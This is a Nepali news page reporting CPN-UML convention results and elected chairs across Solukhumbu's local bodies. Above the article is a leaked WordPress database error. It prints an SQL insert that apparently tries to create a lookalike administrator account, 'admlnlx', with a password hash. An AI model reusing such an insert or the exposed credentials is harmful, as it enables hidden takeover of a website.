WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgEcCC3daqgVlBB3zJOdQFisTwhEFk.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 09:39:19', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । नेकपा एमाले सोलुखुम्बुको ८ स्थानीय तहमध्ये ६ स्थानीय तहमा अधिवेशन सम्पन्न भएको छ । पाँच स्थानीय तहको मंगलबार भएको थियो भने बुधबार थुलुङदुधकोशी गाँउपालिकामा अधिवेशन सम्पन्न भएको नेकपा एमाले सोलुखुम्बुका जिल्ला सचिब आशकुमार राई शिशिरले बताए ।
माप्य दुधकोशी गाँउपालिका र नेचासल्यान गाँउपालिकामा अधिवेशन हुन बाँकी रहेको राईले बताए। राईका अनुसार कात्तिक १५ गते नेचासल्यानको अधिबेशन हुने छ भने माप्यदुधकोशीको मिति तय हुन बाँकी छ ।
कुन पालिकाको अध्यक्षामा को ?
सोलुदुधकुण्ड नगरपालिका अध्यक्षमा मिङ्मार छिरिङ शेर्पा, सोताङ गाँपालिका बीर बहादुर राई, महाकुलुङ गाँउपालिका मछिन्द्र राई, लिखुपिके गाँपालिका हिक्मत बस्नेत, खुम्बु पासाङ ल्हामु गाउँपालिका अध्यक्षमा लाक्पा ग्याल्जेन शेर्पा र थुुलुङ दुधकोशी गाँपालिकामा उदय नारायण बस्नेत सर्वसम्मत चयन हुनुभएको राईले जानकारी दिए ।